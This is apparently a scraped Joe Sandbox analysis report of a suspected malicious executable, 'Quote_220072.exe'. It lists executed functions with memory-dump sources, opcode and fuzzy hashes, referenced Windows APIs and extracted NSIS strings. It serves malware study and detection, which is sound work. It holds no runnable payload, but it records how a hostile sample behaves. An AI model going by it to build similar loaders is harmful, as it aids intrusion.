Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C

Analysis Process: Quote_220072.exePID: 7888, Parent PID: 7384COMMON

Execution Graph

Execution Coverage:	10.1%
Dynamic/Decrypted Code Coverage:	96.5%
Signature Coverage:	0%
Total number of Nodes:	85
Total number of Limit Nodes:	5

Executed Functions

Function 37933608 Relevance: .3, Instructions: 338COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71ea7338ef05e0201bd6fb1184aa238f87b3fbdf7731d53849f8cee1bd733dee
Instruction ID: 681b207683e5e4cfda7a8da04392afd5fc4ddb24960f6f12efdfe0f41038b250
Opcode Fuzzy Hash: 71ea7338ef05e0201bd6fb1184aa238f87b3fbdf7731d53849f8cee1bd733dee
Instruction Fuzzy Hash: D0B1C234B05315DBEB189F75885837E7BB7AFCD200B09856ED446EB384DE399C028796

Function 379302B8 Relevance: 42.2, Strings: 33, Instructions: 903
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

c<, xrefs: 37930415
+c<, xrefs: 379303EC
c<, xrefs: 37930880
Lc<, xrefs: 37930BDC
Mc<, xrefs: 379305BD
rc<, xrefs: 37930A50
tc<, xrefs: 37930456
c<, xrefs: 379309BA
Ac<, xrefs: 37930A2E
Uc<, xrefs: 379306A3
wc<, xrefs: 37930901
5c<, xrefs: 37930C40
Gc<, xrefs: 379308F4
\O'7, xrefs: 3793079E
Wc<, xrefs: 37930309
'c<, xrefs: 37930968
|c<, xrefs: 37930BEC
mc<, xrefs: 379305CD
\O'7, xrefs: 37930E2F
nc<, xrefs: 37930915
Gc<, xrefs: 37930446
0c<, xrefs: 37930AA2
c<, xrefs: 379305E6
bc<, xrefs: 37930A5D
&c<, xrefs: 37930617
1c<, xrefs: 37930573
\O'7, xrefs: 37930FD0
Uc<, xrefs: 379308D2
&c<, xrefs: 37930CFA
c<, xrefs: 37930B25
6c<, xrefs: 37930946
Zc<, xrefs: 37930BB1
"c<, xrefs: 37930AC4

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID: c<$"c<$&c<$&c<$'c<$+c<$0c<$1c<$5c<$6c<$Ac<$Gc<$Gc<$Lc<$Mc<$Uc<$Uc<$Wc<$Zc<$\O'7$\O'7$\O'7$bc<$mc<$nc<$rc<$tc<$wc<$|c<$c<$c<$c<$c<
API String ID: 0-2439685837
Opcode ID: ea56caa833b7c3dc7e3fb4f83f0c50a3b2ff610f880204ff4ef962da32ce3e2d
Instruction ID: cd414f23dd0337b717b84aa3764f4a0432f277459551a0777ea0161c2649ac8f
Opcode Fuzzy Hash: ea56caa833b7c3dc7e3fb4f83f0c50a3b2ff610f880204ff4ef962da32ce3e2d
Instruction Fuzzy Hash: 92724C34B01318CFEB14DFA8C950A6DB7F7AF85314F6086AAC449AB351DF759C818BA1

Function 3488AE22 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3488AEA6
GetCurrentThread.KERNEL32 ref: 3488AEE3
GetCurrentProcess.KERNEL32 ref: 3488AF20
GetCurrentThreadId.KERNEL32 ref: 3488AF79

Memory Dump Source

Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 1a46e3518b413a2beb47930b9b45223ad0805b47a8057dd312928efe150d3c1d
Instruction ID: 28903ac91d2cdfffd3329f0b53b39cffa7e3be56b61b52d08fd92b9e2561ddcc
Opcode Fuzzy Hash: 1a46e3518b413a2beb47930b9b45223ad0805b47a8057dd312928efe150d3c1d
Instruction Fuzzy Hash: B15166B090074A8FDB00CFAAC548BDEBBF1EF88310F248459E409A7391D775A984CB65

Function 3488AE28 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 3488AEA6
GetCurrentThread.KERNEL32 ref: 3488AEE3
GetCurrentProcess.KERNEL32 ref: 3488AF20
GetCurrentThreadId.KERNEL32 ref: 3488AF79

Memory Dump Source

Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: ea34d0e3d936adf07de4905383dd4911bd30b37c23563d0142ff60796efff67f
Instruction ID: 13db6ba35ebbff385e28c3d6873ab8a4d5fb213a104930417ee4691e95bf421a
Opcode Fuzzy Hash: ea34d0e3d936adf07de4905383dd4911bd30b37c23563d0142ff60796efff67f
Instruction Fuzzy Hash: 2D5146B091074A8FDB04CFAAD548BDEBBF5EF88310F208459E409A7391D775A984CB65

Function 3791E6AC Relevance: 1.6, APIs: 1, Instructions: 117
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3791E7CA

Memory Dump Source

Source File: 00000005.00000002.2586987689.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37910000_Quote_220072.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 0864b998bdecc033b9cad4fa6c84884502e15d9b5f94e3bfaad3705bb6f661fe
Instruction ID: f105cc830a8ba9f85decdb07caa8ed936c17944ca046db7b284856d6e7358d0a
Opcode Fuzzy Hash: 0864b998bdecc033b9cad4fa6c84884502e15d9b5f94e3bfaad3705bb6f661fe
Instruction Fuzzy Hash: AD51C0B5D00349EFEB14CF99C880ADEBBB5BF48314F24862AE418AB210D771A841CF90

Function 3791E6B8 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3791E7CA

Memory Dump Source

Source File: 00000005.00000002.2586987689.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37910000_Quote_220072.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 9622c1a039774ca250aba57ddc905374f44e60392c69e1a2f1c1a4646e5a7991
Instruction ID: 15a096a84db2cc1e3776fce87043d1e9b7a8020657490c731176a0c6065b1be4
Opcode Fuzzy Hash: 9622c1a039774ca250aba57ddc905374f44e60392c69e1a2f1c1a4646e5a7991
Instruction Fuzzy Hash: A241C1B5D00309DFEB14CF99C880ADEBBB5BF48314F24822AE419AB210D775A841CF90

Function 377E1B20 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 377E1BE1

Memory Dump Source

Source File: 00000005.00000002.2586806325.00000000377E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_377e0000_Quote_220072.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 233705f5669708b5b30e8ebf4044319db55e53886dda8352b72f3c87615bed4c
Instruction ID: f5534a754fbf79d47359d64b6e6e02ce748ff636c79936302fad9a1d5ad5cd6a
Opcode Fuzzy Hash: 233705f5669708b5b30e8ebf4044319db55e53886dda8352b72f3c87615bed4c
Instruction Fuzzy Hash: 744129B89003099FDB04CF99C445A9AFBF6FF89310F258499D559AB321D774A841CFA0

Function 3488B06A Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3488B0F7

Memory Dump Source

Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3f0708f14464a8b96be43e8eae0b1af1d04fa8afc1c3df7b592f6af53dc970e7
Instruction ID: 1460437211c0855ae027b72cc4f32ea0cd279582aee6d6816b92682cd83de5b2
Opcode Fuzzy Hash: 3f0708f14464a8b96be43e8eae0b1af1d04fa8afc1c3df7b592f6af53dc970e7
Instruction Fuzzy Hash: A42103B5900249AFDB10CFAAD980ADEFFF9EB48310F14802AE914A7350C375A940CFA1

Function 3488B070 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3488B0F7

Memory Dump Source

Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 03791eef9b420f097561c4361889f987b20b96c03d6d26346c5480518f012645
Instruction ID: c051c2a869e75b9dcde4241090c8c6a08d53953e83e37053601f9a61f67cd57d
Opcode Fuzzy Hash: 03791eef9b420f097561c4361889f987b20b96c03d6d26346c5480518f012645
Instruction Fuzzy Hash: A621E4B59002499FDB10CFAAD980ADEBBF4EB48310F14801AE914A3350D374A940CFA1

Function 377E4460 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 377E44BD

Memory Dump Source

Source File: 00000005.00000002.2586806325.00000000377E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_377e0000_Quote_220072.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f2bc65893a8ed3a458b9acd35afa9601504d87f5f36fbd412127cbca54a47fff
Instruction ID: 9d924e28fe0d09895d4ad69286400e0c13221e1e72abb45b432427bbd89728d3
Opcode Fuzzy Hash: f2bc65893a8ed3a458b9acd35afa9601504d87f5f36fbd412127cbca54a47fff
Instruction Fuzzy Hash: 48112EB59003498FDB10CFAAD445BCEBBF8EF48320F24845AE518A7B00D379A940CBA5

Function 377E3148 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 377E44BD

Memory Dump Source

Source File: 00000005.00000002.2586806325.00000000377E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_377e0000_Quote_220072.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 9dc5b41f29b0210ae2767a85d5f5a5afe998be2bed400ace13891f3c5addc219
Instruction ID: c2bd0bbc9438f6483ef46984bb7b11e3c6b91278439bf904c48b0e11d32dc045
Opcode Fuzzy Hash: 9dc5b41f29b0210ae2767a85d5f5a5afe998be2bed400ace13891f3c5addc219
Instruction Fuzzy Hash: 001112B5A047499FDB10DF9AD544BDEBBF8EB49320F20845AE518A7700D378A940CFA5

Function 37933530 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

|, xrefs: 37933590

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: 08740ffc34e770ccde79890f943e5efef40ab6dbfc9b5f48210fb5dd8a5be1ad
Instruction ID: 2a5e508dea3ed9d0d6b3afb901b9758ce93b6ab125497745fd70d8569473aec9
Opcode Fuzzy Hash: 08740ffc34e770ccde79890f943e5efef40ab6dbfc9b5f48210fb5dd8a5be1ad
Instruction Fuzzy Hash: 56215C74B442209FEB44DB788804BAEBBF1AF4C700F14856AE54AEB391DB399911DB80

Function 37933540 Relevance: 1.3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

|, xrefs: 37933590

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID: |
API String ID: 0-2343686810
Opcode ID: f1e5ae8d8cc158e9facd153c2ccf5b36c1c5ab247079040fd2dde7de333dad53
Instruction ID: 27bbaac16ae919b5b073b87cc35a49bf51f35978b2ccceef2c894c4c3c3ad26c
Opcode Fuzzy Hash: f1e5ae8d8cc158e9facd153c2ccf5b36c1c5ab247079040fd2dde7de333dad53
Instruction Fuzzy Hash: 5F114970B40214DFEB54DB788805B6E7BF5AB4C700F14846AE90AE73A0EB75A9018B84

Function 37933C30 Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b99a039c6719c086d30c954969fb037877c58f8ab56894d39d9477dd9ab0be2
Instruction ID: 8c5734acf1028bf580e0261ebdc9acb49248a520ab6cce2e255a99015f1ff010
Opcode Fuzzy Hash: 8b99a039c6719c086d30c954969fb037877c58f8ab56894d39d9477dd9ab0be2
Instruction Fuzzy Hash: 59E15E35B00215CFDB14DFB8C854BADB7B6BF89200F208269D44AAB360DF759D46CB91

Function 37932C33 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ae00eb3372b6bb7c5a3e07f8e3493e2210060a97bb87bd68dd99a25373fe2d
Instruction ID: 1b95e81d5636bf6e070d50dccc3f7b5279ddfc705d6da36855959b45b44306b1
Opcode Fuzzy Hash: f1ae00eb3372b6bb7c5a3e07f8e3493e2210060a97bb87bd68dd99a25373fe2d
Instruction Fuzzy Hash: C451B135B412149BFB54A6ACD85476F239FEB8D760F20472AE01BDB7D4DDA8CC0243A2

Function 37932C38 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ee7845cb6be5870905478d1a4f66e3d5a332706fc35bbcd59696c66b926fbc
Instruction ID: 2475ba68e37369ad1e152111c9d4133932ada10a3fae87c9528ff1b19b5248e6
Opcode Fuzzy Hash: 34ee7845cb6be5870905478d1a4f66e3d5a332706fc35bbcd59696c66b926fbc
Instruction Fuzzy Hash: 5551BF34B412049BFB54A6ACD85476F239FEB8D660F20472AE01BDB7D4DDA8CC0243A2

Function 379332C8 Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5eed07b716dc6b56e4c35f01894a44768924583282612311f08918d562ea53f
Instruction ID: 506a7fa83846dc38114c5df8dc38d17fe00e6b7cf4cb182a7045dd2fb7395022
Opcode Fuzzy Hash: a5eed07b716dc6b56e4c35f01894a44768924583282612311f08918d562ea53f
Instruction Fuzzy Hash: EC51F331B41205DFFB04AFB8D8482ADB7B6EF8C265F148A6AD006EB250DF398855C781

Function 37933AA0 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b1399f0b47fed00f60e56106aa91a1a26cbe29a4a4c1ae79d36309e0f8594d
Instruction ID: 67590bddb64c9e647cfe509ca06884ebefd377d6b4b6770eef438c10ac504cb8
Opcode Fuzzy Hash: 72b1399f0b47fed00f60e56106aa91a1a26cbe29a4a4c1ae79d36309e0f8594d
Instruction Fuzzy Hash: 06411672E047559FDB04CFA9D8006EEBBB5EF8D210F18866BD404EB241DB78A841CBD1

Function 37933FF0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 383a8768b8aa68be579bc82533beed31d84b22489af58c6f418a22f33a9479ad
Instruction ID: 9c627843592732a5a6e2c244829078e0865f635f4439a7e85e779e2406f9c4d8
Opcode Fuzzy Hash: 383a8768b8aa68be579bc82533beed31d84b22489af58c6f418a22f33a9479ad
Instruction Fuzzy Hash: 30416C35701315CFEB14DFB8D8907AD77B2BF99205F208669D416AB3A0DF70A946CB81

Function 3470D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2585646999.000000003470D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3470D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3470d000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a6e728a94a98cef5aae002a03ec14f92119ef27f8595ced78d4bf5ba34da76
Instruction ID: ad1f300a9e5a8d6042e3d4a6a7f460c5a5777cd81b3941e900c89c01731f6197
Opcode Fuzzy Hash: 19a6e728a94a98cef5aae002a03ec14f92119ef27f8595ced78d4bf5ba34da76
Instruction Fuzzy Hash: 7B21CF75605344AFEB04DF20E9C0B06BBA6EB88214F24C9A9D84D4F386C736D846CE62

Function 3470D007 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2585646999.000000003470D000.00000040.00000800.00020000.00000000.sdmp, Offset: 3470D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3470d000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7354102e7e73433b83bffa94b062deb6420bf7c84ff88977fa329be4ee706fd3
Instruction ID: f57fbc9d05e89c04f892362e04e421cfe0e263a7984299bdd5e99610cb44170e
Opcode Fuzzy Hash: 7354102e7e73433b83bffa94b062deb6420bf7c84ff88977fa329be4ee706fd3
Instruction Fuzzy Hash: AD216F755093809FD702CF20D994705BFB2EB46214F28C5DAD8498F6A7C33A984ACF62

Function 379323E8 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 609b7693b842e8cdb60fa8e2a8f3077be23fac3d9b49bdf224475e1640c7a10f
Instruction ID: cbe58080f81d7789bb8e9d90a135e380bd2c9faf9101d413771429226b129f7c
Opcode Fuzzy Hash: 609b7693b842e8cdb60fa8e2a8f3077be23fac3d9b49bdf224475e1640c7a10f
Instruction Fuzzy Hash: D901D435B042200FF715853D9855B2E6BDADBCA764F14893EE00ACF352DE25DC0743A2

Function 379335F8 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d035c9be0bc6238270d205cd959729e82d254a419b85c59b0c0e3dfd55369a92
Instruction ID: 383133222587585dd355e4ef3ef5aa8735ec847efb9d0102ad98c15e8b52a641
Opcode Fuzzy Hash: d035c9be0bc6238270d205cd959729e82d254a419b85c59b0c0e3dfd55369a92
Instruction Fuzzy Hash: 6F01D43430A7508FE715E63998A022E779B9FCE06874A453DD10A8F392CF75DC068397

Function 379323F8 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 818d2792f063c8c0b2378fb23ebc1371b92f1c43c69812af5976a90aece78faf
Instruction ID: f3e27f21b78bd69eb93ea65300048ad36794e782f1c9b576b196a086b95be551
Opcode Fuzzy Hash: 818d2792f063c8c0b2378fb23ebc1371b92f1c43c69812af5976a90aece78faf
Instruction Fuzzy Hash: 5E01AF35B001101BFB15957DA558B2FA7DADBC9B64F20893EE00ACB352EE35DC0343A5

Function 346FD628 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2585615726.00000000346FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 346FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_346fd000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe90cbda5ff6e94277ca358a30ab4e7850a39c54046ef499a93ad652e4d1620b
Instruction ID: 86a832f8e0d64e800ed4f43ee33218180c0c6e34745629b4d48ea9eb1a6bb7e9
Opcode Fuzzy Hash: fe90cbda5ff6e94277ca358a30ab4e7850a39c54046ef499a93ad652e4d1620b
Instruction Fuzzy Hash: DDF0CD72508340AFE7108F16CD84B62FF98EF52264F18C45AED4C0A287C27AA840CAB2

Function 379332B8 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7290c9e6c1fef26ce503ae20d9c68486a39eb184afa15bc16f06c3de7ecec477
Instruction ID: 88e989553afc9bc7bf9d14dab7e44c3118fed140da6e079a22e132e73385d8af
Opcode Fuzzy Hash: 7290c9e6c1fef26ce503ae20d9c68486a39eb184afa15bc16f06c3de7ecec477
Instruction Fuzzy Hash: BDE02236B412282BAF1459759C04CEFBB6BE7C9164F044A7AED02E7241CA39592683C0

Non-executed Functions

Function 004036DA Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 109COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004036E6
UXTHEME, xrefs: 004037CE, 004037D3, 004037D9
NSIS Error, xrefs: 00403840

Memory Dump Source

Source File: 00000005.00000002.2564589039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2564548754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564618599.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564657123.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564799193.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Quote_220072.jbxd

Similarity

API ID: ErrorModeVersion
String ID: Error writing temporary file. Make sure your temp folder is valid.$NSIS Error$UXTHEME
API String ID: 3050056751-1170945346
Opcode ID: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction ID: 04f03ee53333af138268126fb18566c4da9f6100b8f71d1fbc27ece8fdb1561f
Opcode Fuzzy Hash: 3492d16e7cd3d864a73ca6f3751150f47a45c6dad39efc7e233a49914b035e7a
Instruction Fuzzy Hash: CF3104B0504350AFD310AF659D95BBB3AE8EB85305F40443FF8C6BB2C1DA7C89448B6A

Function 0040617C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
wsprintfW.USER32 ref: 004061CF
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

%s%S.dll, xrefs: 004061C9
\, xrefs: 004061A4
UXTHEME, xrefs: 0040618B

Memory Dump Source

Source File: 00000005.00000002.2564589039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2564548754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564618599.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564657123.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564799193.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Quote_220072.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction ID: a4cd9840ceca3203298f5f6208b2692cfaa140b5cc7ad0efff7adaa08ca45ff7
Opcode Fuzzy Hash: a55e054656ac5113de9e3194c4fa3b920efe4ffbe4a90e414e158052a1d2e5cc
Instruction Fuzzy Hash: CEF0BB7190161457D710B764DE0DB9A367CEB10304F54447A6646F62C1EB7C9A54C79C

Function 004068C4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,004037EE,0000000B), ref: 004068D2
GetProcAddress.KERNEL32(00000000), ref: 004068EE

Part of subcall function 0040617C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406193
Part of subcall function 0040617C: wsprintfW.USER32 ref: 004061CF
Part of subcall function 0040617C: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004061E3

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 004068C5
UXTHEME, xrefs: 004068C4, 004068D1, 004068DC

Memory Dump Source

Source File: 00000005.00000002.2564589039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2564548754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564618599.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564657123.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000005.00000002.2564799193.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Quote_220072.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID: Error writing temporary file. Make sure your temp folder is valid.$UXTHEME
API String ID: 2547128583-890815371
Opcode ID: 8d13772ca545db48d6537eade3d6ef1f8b9852c922338cf59e69f906f7cb5f01
Instruction ID: cca553acf36b1fe6902a80dcde2ed56f94a70d609a724c5234c7087bacb34bc4
